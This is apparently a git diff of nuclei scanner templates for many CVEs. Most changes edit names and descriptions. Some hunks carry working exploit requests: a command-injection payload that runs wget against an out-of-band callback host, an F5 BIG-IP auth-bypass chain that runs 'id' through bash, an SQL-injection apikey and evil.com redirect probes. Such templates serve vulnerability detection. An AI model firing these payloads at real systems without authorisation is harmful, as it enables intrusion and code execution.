- http://packetstormsecurity.com/files/152487/Zimbra-Collaboration-Autodiscover-Servlet-XXE-ProxyServlet-SSRF.html
- https://isc.sans.edu/forums/diary/CVE20199670+Zimbra+Collaboration+Suite+XXE+vulnerability/27570/
- https://nvd.nist.gov/vuln/detail/CVE-2019-9670
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
@ -48,3 +49,5 @@ requests:
- type: status
status:
- 503
# Enhanced by mp on 2022/05/03

View File

@ -1,17 +1,15 @@
id: CVE-2019-9733
info:
name: Artifactory Access-Admin Login Bypass
name: JFrog Artifactory 6.7.3 - Admin Login Bypass
author: akshansh
severity: critical
description: An issue was discovered in JFrog Artifactory 6.7.3. By default, the access-admin account is used to reset the password of the admin account in case an administrator gets locked out from the Artifactory
console. This is only allowable from a connection directly from localhost, but providing a X-Forwarded-For HTTP header to the request allows an unauthenticated user to login with the default credentials of the
access-admin account while bypassing the whitelist of allowed IP addresses. The access-admin account can use Artifactory's API to request authentication tokens for all users including the admin account and, in
turn, assume full control of all artifacts and repositories managed by Artifactory.
description: JFrog Artifactory 6.7.3 is vulnerable to an admin login bypass issue because by default the access-admin account is used to reset the password of the admin account. While this is only allowable from a connection directly from localhost, providing an X-Forwarded-For HTTP header to the request allows an unauthenticated user to login with the default credentials of the access-admin account while bypassing the whitelist of allowed IP addresses. The access-admin account can use Artifactory's API to request authentication tokens for all users including the admin account and, in turn, assume full control of all artifacts and repositories managed by Artifactory.
reference:
- http://packetstormsecurity.com/files/152172/JFrog-Artifactory-Administrator-Authentication-Bypass.html
- https://www.ciphertechs.com/jfrog-artifactory-advisory/
- https://www.jfrog.com/confluence/display/RTF/Release+Notes#ReleaseNotes-Artifactory6.8.6
- https://nvd.nist.gov/vuln/detail/CVE-2019-9733
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
@ -43,3 +41,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/05/04

View File

@ -1,10 +1,11 @@
id: CVE-2020-11034
info:
name: GLPI v.9.4.6 - Open redirect
name: GLPI <9.4.6 - Open Redirect
author: pikpikcu
severity: medium
description: In GLPI before version 9.4.6, there is a vulnerability that allows bypassing the open redirect protection, which is based on a regexp. This is fixed in version 9.4.6.
description: GLPI prior 9.4.6 contains an open redirect vulnerability based on a regexp.
remediation: Upgrade to version 9.4.6 or later.
reference:
- https://github.com/glpi-project/glpi/security/advisories/GHSA-gxv6-xq9q-37hg
- https://github.com/glpi-project/glpi/archive/9.4.6.zip
@ -28,3 +29,5 @@ requests:
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?evil\.com(?:\s*?)$'
part: header
# Enhanced by mp on 2022/05/04

View File

@ -1,13 +1,14 @@
id: CVE-2020-11529
info:
name: Grav 1.7 Open Redirect
name: Grav <1.7 - Open Redirect
author: 0x_Akoko
severity: medium
description: Common/Grav.php in Grav before 1.7 has an Open Redirect. This is partially fixed in 1.6.23 and still present in 1.6.x.
description: Grav before 1.7 has an open redirect vulnerability via common/Grav.php. This is partially fixed in 1.6.23 and still present in 1.6.x.
reference:
- https://github.com/getgrav/grav/issues/3134
- https://www.cvedetails.com/cve/CVE-2020-11529
- https://nvd.nist.gov/vuln/detail/CVE-2020-11529
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -25,3 +26,5 @@ requests:
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$'
part: header
# Enhanced by mp on 2022/05/04

View File

@ -1,11 +1,10 @@
id: CVE-2020-11546
info:
name: SuperWebmailer Remote Code Execution
name: SuperWebmailer 7.21.0.01526 - Remote Code Execution
author: Official_BlackHat13
severity: critical
description: SuperWebMailer 7.21.0.01526 is susceptible to a remote code execution vulnerability in the Language parameter of mailingupgrade.php. An unauthenticated remote attacker can exploit this behavior to
execute arbitrary PHP code via Code Injection.
description: SuperWebMailer 7.21.0.01526 is susceptible to a remote code execution vulnerability in the Language parameter of mailingupgrade.php. An unauthenticated remote attacker can exploit this behavior to execute arbitrary PHP code via Code Injection.
reference:
- https://github.com/Official-BlackHat13/CVE-2020-11546/
- https://blog.to.com/advisory-superwebmailer-cve-2020-11546/
@ -41,3 +40,5 @@ requests:
- ajax_getemailingactions.php
- ajax_getemailtemplates.php
condition: and
# Enhanced by mp on 2022/05/04

View File

@ -1,7 +1,7 @@
id: CVE-2020-12116
info:
name: Unauthenticated Zoho ManageEngine OpManger Arbitrary File Read
name: Zoho ManageEngine OpManger - Arbitrary File Read
author: dwisiswant0
severity: high
description: Zoho ManageEngine OpManager Stable build before 124196 and Released build before 125125 allows an unauthenticated attacker to read arbitrary files on the server by sending a specially crafted request.
@ -48,4 +48,4 @@ requests:
- 'status_code_2 == 200'
condition: and
# Enhanced by mp on 2022/04/04
# Enhanced by mp on 2022/05/04

View File

@ -4,10 +4,10 @@ info:
name: Onkyo TX-NR585 Web Interface - Directory Traversal
author: 0x_Akoko
severity: high
description: A Local File Inclusion (LFI) issue on Onkyo TX-NR585 1000-0000-000-0008-0000 devices allows remote unauthenticated users on the network to read sensitive files via %2e%2e%2f directory traversal
description: "Onkyo TX-NR585 1000-0000-000-0008-0000 devices allows remote unauthenticated users on the network to read sensitive files via %2e%2e%2f directory traversal and local file inclusion."
reference:
- https://blog.spookysec.net/onkyo-lfi
- https://www.cvedetails.com/cve/CVE-2020-12447
- https://nvd.nist.gov/vuln/detail/CVE-2020-12447
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
@ -30,3 +30,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/05/04

View File

@ -1,7 +1,7 @@
id: CVE-2020-14092
info:
name: WordPress PayPal Pro <1.1.65- SQL Injection
name: WordPress PayPal Pro <1.1.65 - SQL Injection
author: princechaddha
severity: critical
description: "WordPress PayPal Pro plugin before 1.1.65 is susceptible to SQL injection via the 'query' parameter which allows for any unauthenticated user to perform SQL queries with the results output to a web page in JSON format."
@ -40,4 +40,4 @@ requests:
status:
- 200
# Enhanced by mp on 2022/04/27
# Enhanced by mp on 2022/05/05

View File

@ -19,15 +19,17 @@ requests:
- method: GET
path:
- "{{BaseURL}}"
headers:
X-Forwarded-Prefix: "https://foo.nl"
matchers-condition: and
matchers:
- type: status
status:
- 302
- type: word
part: body
words:
- "<a href=\"https://foo.nl/dashboard/\">Found</a>"
condition: or
part: body

View File

@ -1,12 +1,13 @@
id: CVE-2020-17453
info:
name: WSO2 Carbon Management Console - XSS
name: WSO2 Carbon Management Console <=5.10 - Cross-Site Scripting
author: madrobot
severity: medium
description: Reflected XSS vulnerability can be exploited by tampering a request parameter in Management Console. This can be performed in both authenticated and unauthenticated requests.
description: WSO2 Management Console through 5.10 is susceptible to reflected cross-site scripting which can be exploited by tampering a request parameter in Management Console. This can be performed in both authenticated and unauthenticated requests.
reference:
- https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2020-1132
- https://nvd.nist.gov/vuln/detail/CVE-2020-17453
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -34,3 +35,5 @@ requests:
words:
- "text/html"
part: header
# Enhanced by mp on 2022/05/04

View File

@ -19,6 +19,7 @@ requests:
- method: GET
path:
- "{{BaseURL}}/fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27;"
redirects: true
max-redirects: 1
matchers-condition: and
@ -26,17 +27,19 @@ requests:
- type: word
words:
- "artica-applianc"
- type: status
status:
- 200
- 301
- 302
condition: or
- type: word
name: session
part: header
words:
- "PHPSESSID"
part: header
extractors:
- type: kval
kval:

View File

@ -1,7 +1,7 @@
id: CVE-2020-19360
info:
name: FHEM 6.0 Local File Inclusion
name: FHEM 6.0 - Local File Inclusion
author: 0x_Akoko
severity: high
description: FHEM version 6.0 suffers from a local file inclusion vulnerability.
@ -28,3 +28,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/05/04

View File

@ -1,12 +1,13 @@
id: CVE-2020-2140
info:
name: Jenkin Audit Trail Plugin XSS
name: Jenkin Audit Trail <=3.2 - Cross-Site Scripting
author: j3ssie/geraldino2
severity: medium
description: Jenkins Audit Trail Plugin 3.2 and earlier does not escape the error message for the URL Patterns field form validation, resulting in a reflected cross-site scripting vulnerability.
description: Jenkins Audit Trail 3.2 and earlier does not escape the error message for the URL Patterns field form validation, resulting in a reflected cross-site scripting vulnerability.
reference:
- https://www.jenkins.io/security/advisory/2020-03-09/
- https://nvd.nist.gov/vuln/detail/CVE-2020-2140
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -35,3 +36,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/05/04

View File

@ -4,10 +4,10 @@ info:
name: Kyocera Printer d-COPIA253MF - Directory Traversal
author: 0x_Akoko
severity: high
description: A directory traversal vulnerability exists in Kyocera Printer d-COPIA253MF plus. Successful exploitation of this vulnerability could allow an attacker to retrieve or view arbitrary files from the affected server.
description: Kyocera Printer d-COPIA253MF plus is susceptible to a directory traversal vulnerability which could allow an attacker to retrieve or view arbitrary files from the affected server.
reference:
- https://www.exploit-db.com/exploits/48561
- https://www.cvedetails.com/cve/CVE-2020-23575
- https://nvd.nist.gov/vuln/detail/CVE-2020-23575
- https://www.kyoceradocumentsolutions.com.tr/tr.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
@ -33,3 +33,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/05/04

View File

@ -1,14 +1,15 @@
id: CVE-2020-24223
info:
name: Mara CMS 7.5 - Reflective Cross-Site Scripting
name: Mara CMS 7.5 - Cross-Site Scripting
author: pikpikcu
severity: medium
description: Mara CMS 7.5 allows cross-site scripting (XSS) in contact.php via the theme or pagetheme parameters.
description: "Mara CMS 7.5 allows reflected cross-site scripting in contact.php via the theme or pagetheme parameters."
reference:
- https://www.exploit-db.com/exploits/48777
- https://sourceforge.net/projects/maracms/ # vendor homepage
- https://sourceforge.net/projects/maracms/files/MaraCMS75.zip/download # software link
- https://nvd.nist.gov/vuln/detail/CVE-2020-24223
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -33,3 +34,5 @@ requests:
words:
- "text/html"
part: header
# Enhanced by mp on 2022/05/04

View File

@ -16,16 +16,16 @@ info:
requests:
- method: GET
path:
- '{{BaseURL}}/find_v2/_click?_t_id=&_t_q=&_t_hit.id=&_t_redirect=https://example.com'
matchers-condition: and
matchers:
- type: word
part: header
words:
- "Location: https://example.com"
part: header
- type: status
status:
- 301

View File

@ -27,13 +27,17 @@ requests:
Host: {{Hostname}}
Accept: */*
Content-Type: application/x-www-form-urlencoded
username=root&password={{url_encode('123\",\"$6$$\"));import os;os.system(\"wget http://{{interactsh-url}}\");print(crypt.crypt(\"')}}
- |
POST /auth HTTP/1.1
Host: {{Hostname}}
Accept: */*
Content-Type: application/x-www-form-urlencoded
username=root&password={{url_encode('123\",\"$6$$\"));import os;os.system(\"wget http://{{interactsh-url}}\");print(crypt.crypt(\"')}}
matchers-condition: and
matchers:
- type: status

View File

@ -5,11 +5,11 @@ info:
author: gy741
severity: critical
description: |
A path traversal vulnerability in the web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 could allow unauthenticated remote attackers to bypass authentication.
Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 are susceptible to a path traversal vulnerability that could allow unauthenticated remote attackers to bypass authentication in their web interfaces.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-20090
- https://www.tenable.com/security/research/tra-2021-13
- https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2
- https://nvd.nist.gov/vuln/detail/CVE-2021-20090
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
@ -36,3 +36,5 @@ requests:
- 'pppoe'
- 'wan'
condition: and
# Enhanced by mp on 2022/05/05

View File

@ -1,11 +1,10 @@
id: CVE-2021-20158
info:
name: Trendnet AC2600 TEW-827DRU - Unauthenticated Admin Password Change
name: Trendnet AC2600 TEW-827DRU 2.08B01 - Admin Password Change
author: gy741
severity: critical
description: Trendnet AC2600 TEW-827DRU version 2.08B01 contains an authentication bypass vulnerability. It is possible for an unauthenticated, malicious actor to force change the admin password due to a hidden
administrative command.
description: Trendnet AC2600 TEW-827DRU version 2.08B01 contains an authentication bypass vulnerability. It is possible for an unauthenticated, malicious actor to force change the admin password due to a hidden administrative command.
reference:
- https://www.tenable.com/security/research/tra-2021-54
- https://nvd.nist.gov/vuln/detail/CVE-2021-20150
@ -51,4 +50,4 @@ requests:
words:
- "text/html"
# Enhanced by cs on 2022/02/25
# Enhanced by mp on 2022/05/05

View File

@ -1,12 +1,10 @@
id: CVE-2021-20167
info:
name: Netgear RAX43 - Unauthenticated Command Injection / Authentication Bypass Buffer Overrun via LAN Interface
name: Netgear RAX43 1.0.3.96 - Command Injection/Authentication Bypass Buffer Overrun
author: gy741
severity: critical
description: 'Netgear RAX43 version 1.0.3.96 contains a command injection and authentication bypass vulnerability. The readycloud_control.cgi CGI application is vulnerable to command injection in the name parameter.
Additionally, the URL parsing functionality in the cgi-bin endpoint of the router containers a buffer overrun issue that can redirection control flow of the application. Note: This vulnerability uses a combination
of CVE-2021-20166 and CVE-2021-20167.'
description: 'Netgear RAX43 version 1.0.3.96 contains a command injection and authentication bypass vulnerability. The readycloud_control.cgi CGI application is vulnerable to command injection in the name parameter. Additionally, the URL parsing functionality in the cgi-bin endpoint of the router containers a buffer overrun issue that can redirection control flow of the application. Note: This vulnerability uses a combination of CVE-2021-20166 and CVE-2021-20167.'
reference:
- https://www.tenable.com/security/research/tra-2021-55
- https://nvd.nist.gov/vuln/detail/CVE-2021-20166
@ -34,4 +32,4 @@ requests:
words:
- "http"
# Enhanced by cs on 2022/02/22
# Enhanced by mp on 2022/05/05

View File

@ -1,11 +1,10 @@
id: CVE-2021-20837
info:
name: Unauthenticated RCE In MovableType
name: MovableType - Remote Command Injection
author: dhiyaneshDK,hackergautam
severity: critical
description: 5002 and earlier (Movable Type Advanced 7 Series), Movable Type Advanced 6.8. 2 and earlier (Movable Type Advanced 6 Series), Movable Type Premium 1.46 and earlier, and Movable Type Premium Advanced
1.46 and earlier allow remote attackers to execute arbitrary OS commands via unspecified vectors.
description: MovableType 5002 and earlier (Movable Type Advanced 7 Series), Movable Type Advanced 6.8. 2 and earlier (Movable Type Advanced 6 Series), Movable Type Premium 1.46 and earlier, and Movable Type Premium Advanced 1.46 and earlier allow remote attackers to execute arbitrary OS commands via unspecified vectors.
reference:
- https://nemesis.sh/posts/movable-type-0day/
- https://github.com/ghost-nemesis/cve-2021-20837-poc
@ -53,3 +52,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/05/05

View File

@ -1,11 +1,10 @@
id: CVE-2021-21307
info:
name: Remote Code Exploit in Lucee Admin
name: Lucee Admin - Remote Code Execution
author: dhiyaneshDk
severity: critical
description: Lucee Server is a dynamic, Java based (JSR-223), tag and scripting language used for rapid web application development. In Lucee Admin before versions 5.3.7.47, 5.3.6.68 or 5.3.5.96 there is an unauthenticated
remote code exploit. This is fixed in versions 5.3.7.47, 5.3.6.68 or 5.3.5.96. As a workaround, one can block access to the Lucee Administrator.
description: Lucee Admin before versions 5.3.7.47, 5.3.6.68 or 5.3.5.96 contains an unauthenticated remote code execution vulnerability.
reference:
- https://github.com/lucee/Lucee/security/advisories/GHSA-2xvv-723c-8p7r
- https://github.com/httpvoid/writeups/blob/main/Apple-RCE.md
@ -15,6 +14,7 @@ info:
cvss-score: 9.8
cve-id: CVE-2021-21307
cwe-id: CWE-862
remediation: This is fixed in versions 5.3.7.47, 5.3.6.68 or 5.3.5.96. As a workaround, block access to the Lucee Administrator.
tags: cve,cve2021,rce,lucee,adobe
requests:
@ -84,3 +84,5 @@ requests:
- type: regex
regex:
- "(u|g)id=.*"
# Enhanced by mp on 2022/05/05

View File

@ -1,14 +1,15 @@
id: CVE-2021-21479
info:
name: SCIMono < v0.0.19 Remote Code Execution
name: SCIMono <0.0.19 - Remote Code Execution
author: dwisiswant0
severity: critical
description: |
In SCIMono before 0.0.19, it is possible for an attacker to inject and
execute java expression compromising the availability and integrity of the system.
SCIMono before 0.0.19 is vulnerable to remote code execution because it is possible for an attacker to inject and
execute java expressions and compromise the availability and integrity of the system.
reference:
- https://securitylab.github.com/advisories/GHSL-2020-227-scimono-ssti/
- https://nvd.nist.gov/vuln/detail/CVE-2021-21479
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
cvss-score: 9.1
@ -30,3 +31,5 @@ requests:
- '"status" : "400"'
part: body
condition: and
# Enhanced by mp on 2022/05/05

View File

@ -1,11 +1,10 @@
id: CVE-2021-21881
info:
name: Lantronix PremierWave 2050 - Remote Code Execution
name: Lantronix PremierWave 2050 8.9.0.0R4 - Remote Command Injection
author: gy741
severity: critical
description: An OS command injection vulnerability exists in the Web Manager Wireless Network Scanner functionality of Lantronix PremierWave 2050 8.9.0.0R4. A specially-crafted HTTP request can lead to command
execution. An attacker can make an authenticated HTTP request to trigger this vulnerability.
description: Lantronix PremierWave 2050 8.9.0.0R4 contains an OS command injection vulnerability. A specially-crafted HTTP request can lead to command in the Web Manager Wireless Network Scanner. An attacker can make an authenticated HTTP request to trigger this vulnerability.
reference:
- https://talosintelligence.com/vulnerability_reports/TALOS-2021-1325
- https://nvd.nist.gov/vuln/detail/CVE-2021-21881
@ -39,3 +38,5 @@ requests:
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
# Enhanced by mp on 2022/05/05

View File

@ -1,12 +1,13 @@
id: CVE-2021-21972
info:
name: VMware vCenter Unauthenticated RCE
name: VMware vSphere Client (HTML5) - Remote Code Execution
author: dwisiswant0
severity: critical
description: The vulnerability allows unauthenticated remote attackers to upload files leading to remote code execution (RCE). This templates only detects the plugin.
description: "VMware vCenter vSphere Client (HTML5) contains a remote code execution vulnerability in a vCenter Server plugin. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server. This affects VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2)."
reference:
- https://swarm.ptsecurity.com/unauth-rce-vmware/
- https://nvd.nist.gov/vuln/detail/CVE-2021-21972
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
@ -32,3 +33,5 @@ requests:
regex:
- "(Install|Config) Final Progress"
part: body
# Enhanced by mp on 2022/05/05

View File

@ -1,16 +1,16 @@
id: CVE-2021-21978
info:
name: VMware View Planner Unauthenticated RCE
name: VMware View Planner <4.6 SP1- Remote Code Execution
author: dwisiswant0
severity: critical
description: |
This template detects an VMware View Planner 4.x prior to 4.6 Security Patch 1 contains a remote code execution vulnerability.
Improper input validation and lack of authorization leading to arbitrary file upload in logupload web application.
VMware View Planner 4.x prior to 4.6 Security Patch 1 contains a remote code execution vulnerability due to improper input validation and lack of authorization leading to arbitrary file upload in logupload web application.
An unauthorized attacker with network access to View Planner Harness could upload and execute a specially crafted
file leading to remote code execution within the logupload container.
reference:
- https://twitter.com/osama_hroot/status/1367258907601698816
- https://nvd.nist.gov/vuln/detail/CVE-2021-21978
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
@ -48,3 +48,5 @@ requests:
- type: dsl
dsl:
- "len(body) == 28" # length of "\nFile uploaded successfully."
# Enhanced by mp on 2022/05/05

View File

@ -1,15 +1,15 @@
id: CVE-2021-21985
info:
name: VMware vSphere Client (HTML5) RCE
name: VMware vSphere Client (HTML5) - Remote Code Execution
author: D0rkerDevil
severity: critical
description: |
The vSphere Client (HTML5) contains a remote code execution vulnerability due to lack of input validation in the Virtual SAN Health Check plug-in which is enabled by default in vCenter Server. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-21985
- https://www.vmware.com/security/advisories/VMSA-2021-0010.html
- https://github.com/alt3kx/CVE-2021-21985_PoC
- https://nvd.nist.gov/vuln/detail/CVE-2021-21985
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
@ -32,3 +32,5 @@ requests:
words:
- '{"result":{"isDisconnected":'
part: body
# Enhanced by mp on 2022/05/05

View File

@ -1,15 +1,15 @@
id: CVE-2021-22005
info:
name: VMware vCenter Server file upload vulnerability
name: VMware vCenter Server - Arbitrary File Upload
author: PR3R00T
severity: critical
description: The vCenter Server contains an arbitrary file upload vulnerability in the Analytics service. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3
base score of 9.8.
description: VMware vCenter Server contains an arbitrary file upload vulnerability in the Analytics service. A malicious actor with network access to port 443 on vCenter Server may exploit this issue to execute code on vCenter Server by uploading a specially crafted file.
reference:
- https://kb.vmware.com/s/article/85717
- https://www.vmware.com/security/advisories/VMSA-2021-0020.html
- https://core.vmware.com/vmsa-2021-0020-questions-answers-faq
- https://nvd.nist.gov/vuln/detail/CVE-2021-22005
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
@ -39,3 +39,5 @@ requests:
- "contains(body_1, 'VMware vSphere')"
- "content_length_2 == 0"
condition: and
# Enhanced by mp on 2022/05/05

View File

@ -1,12 +1,10 @@
id: CVE-2021-22205
info:
name: Fingerprinting GitLab CE/EE Unauthenticated RCE using ExifTool - Passive Detection
name: GitLab CE/EE - Remote Code Execution
author: GitLab Red Team
severity: critical
description: An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command
execution. This template attempts to passively identify vulnerable versions of GitLab without the need for an exploit by matching unique hashes for the application-<hash>.css file in the header for unauthenticated
requests. Positive matches do not guarantee exploitability. Tooling to find relevant hashes based on the semantic version ranges specified in the CVE is linked in the references section below.
description: GitLab CE/EE starting from 11.9 does not properly validate image files that were passed to a file parser, resulting in a remote command execution vulnerability. This template attempts to passively identify vulnerable versions of GitLab without the need for an exploit by matching unique hashes for the application-<hash>.css file in the header for unauthenticated requests. Positive matches do not guarantee exploitability. Tooling to find relevant hashes based on the semantic version ranges specified in the CVE is linked in the references section below.
reference:
- https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/red-team-research/cve-2021-22205-hash-generator
- https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/red-team-operations/-/issues/196
@ -130,3 +128,5 @@ requests:
group: 1
regex:
- '(?:application-)(\S{64})(?:\.css)'
# Enhanced by mp on 2022/05/05

View File

@ -1,10 +1,10 @@
id: CVE-2021-22986
info:
name: F5 BIG-IP iControl REST Unauthenticated Remote Command Execution
name: F5 BIG-IP iControl REST - Remote Command Execution
author: rootxharsh,iamnoooob
severity: critical
description: The F5 BIG-IP iControl REST interface has an unauthenticated remote command execution vulnerability.
description: F5 BIG-IP iControl REST interface is susceptible to an unauthenticated remote command execution vulnerability.
reference:
- https://attackerkb.com/topics/J6pWeg5saG/k03009991-icontrol-rest-unauthenticated-remote-command-execution-vulnerability-cve-2021-22986
- https://support.f5.com/csp/article/K03009991
@ -24,7 +24,7 @@ requests:
Authorization: Basic YWRtaW46
Content-Type: application/json
Cookie: BIGIPAuthCookie=1234
Connection: close
{"username":"admin","userReference":{},"loginReference":{"link":"http://localhost/mgmt/shared/gossip"}}
- |
POST /mgmt/tm/util/bash HTTP/1.1
@ -32,8 +32,9 @@ requests:
Accept-Language: en
X-F5-Auth-Token: {{token}}
Content-Type: application/json
Connection: close
{"command":"run","utilCmdArgs":"-c id"}
extractors:
- type: regex
part: body
@ -42,6 +43,7 @@ requests:
group: 1
regex:
- "([A-Z0-9]{26})"
- type: regex
part: body
group: 1
@ -55,4 +57,4 @@ requests:
- "uid="
condition: and
# Enhanced by mp on 2022/04/13
# Enhanced by mp on 2022/05/05

View File

@ -1,13 +1,11 @@
id: CVE-2021-24285
info:
name: Car Seller - Auto Classifieds Script WordPress plugin SQLI
name: WordPress Car Seller - Auto Classifieds Script - SQL Injection
author: ShreyaPohekar
severity: critical
description: The request_list_request AJAX call of the Car Seller - Auto Classifieds Script WordPress plugin through 2.1.0, available to both authenticated and unauthenticated users, does not sanitise, validate
or escape the order_id POST parameter before using it in a SQL statement, leading to a SQL Injection issue.
description: "The request_list_request AJAX call of the Car Seller - Auto Classifieds Script WordPress plugin through 2.1.0, available to both authenticated and unauthenticated users, does not sanitize, validate or escape the order_id POST parameter before using it in a SQL statement, leading to a SQL injection issue."
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-24285
- https://codevigilant.com/disclosure/2021/wp-plugin-cars-seller-auto-classifieds-script-sql-injection/
- https://wpscan.com/vulnerability/f35d6ab7-dd52-48b3-a79c-3f89edf24162
classification:
@ -36,3 +34,5 @@ requests:
words:
- "qzvvqhWAAlCfTiMDmAoqzkTpJEzPwVFSaIpfAfdfTinrMqqxkq"
part: body
# Enhanced by mp on 2022/05/05

View File

@ -1,13 +1,13 @@
id: CVE-2021-24472
info:
name: Onair2 < 3.9.9.2 & KenthaRadio < 2.0.2 - Unauthenticated RFI and SSRF
name: Onair2 < 3.9.9.2 & KenthaRadio < 2.0.2 - Remote File Inclusion/Server-Side Request Forgery
author: Suman_Kar
severity: critical
description: The theme and plugin have exposed proxy functionality to unauthenticated users, sending requests to this proxy functionality will have the web server fetch and display the content from any URI, this
would allow for SSRF (Server Side Request Forgery) and RFI (Remote File Inclusion) vulnerabilities on the website.
description: Onair2 < 3.9.9.2 and KenthaRadio < 2.0.2 have exposed proxy functionality to unauthenticated users. Sending requests to this proxy functionality will have the web server fetch and display the content from any URI, allowing remote file inclusion and server-side request forgery.
reference:
- https://wpscan.com/vulnerability/17591ac5-88fa-4cae-a61a-4dcf5dc0b72a
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24472
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
@ -32,3 +32,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/05/05

View File

@ -2,7 +2,7 @@ id: CVE-2021-27358
info:
name: Grafana Unauthenticated Snapshot Creation
author: pdteam
author: pdteam,bing0o
severity: high
description: Grafana 6.7.3 through 7.4.1 snapshot functionality can allow an unauthenticated remote attacker to trigger a Denial of Service via a remote API call if a commonly used configuration is set.
reference:
@ -13,6 +13,7 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
cvss-score: 7.5
cve-id: CVE-2021-27358
cwe-id: CWE-306
tags: cve,cve2021,grafana,unauth
requests:
@ -20,7 +21,6 @@ requests:
- |
POST /api/snapshots HTTP/1.1
Host: {{Hostname}}
Accept: application/json
Content-Type: application/json
{"dashboard": {"editable":false,"hideControls":true,"nav":[{"enable":false,"type":"timepicker"}],"rows": [{}],"style":"dark","tags":[],"templating":{"list":[]},"time":{},"timezone":"browser","title":"Home","version":5},"expires": 3600}

View File

@ -7,12 +7,11 @@ info:
description: A directory traversal vulnerability in Ivanti Avalanche allows remote unauthenticated user to access files that reside outside the 'image' folder
reference:
- https://ssd-disclosure.com/ssd-advisory-ivanti-avalanche-directory-traversal/
tags: cve,cve2021,avalanche,traversal
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50
cve-id: CVE-2021-30497
cwe-id: CWE-22
tags: cve,cve2021,avalanche,traversal
requests:
- method: GET

View File

@ -0,0 +1,43 @@
id: CVE-2021-37416
info:
name: Zoho ManageEngine ADSelfService Plus - Reflected XSS
author: edoardottt
severity: medium
description: Zoho ManageEngine ADSelfService Plus version 6103 and prior is vulnerable to reflected XSS on the loadframe page.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2021-37416
cwe-id: CWE-79
metadata:
shodan-query: http.title:"ManageEngine"
verified: true
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-37416
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37416
- https://blog.stmcyber.com/vulns/cve-2021-37416/
tags: cve,cve2021,zoho,xss
requests:
- method: GET
path:
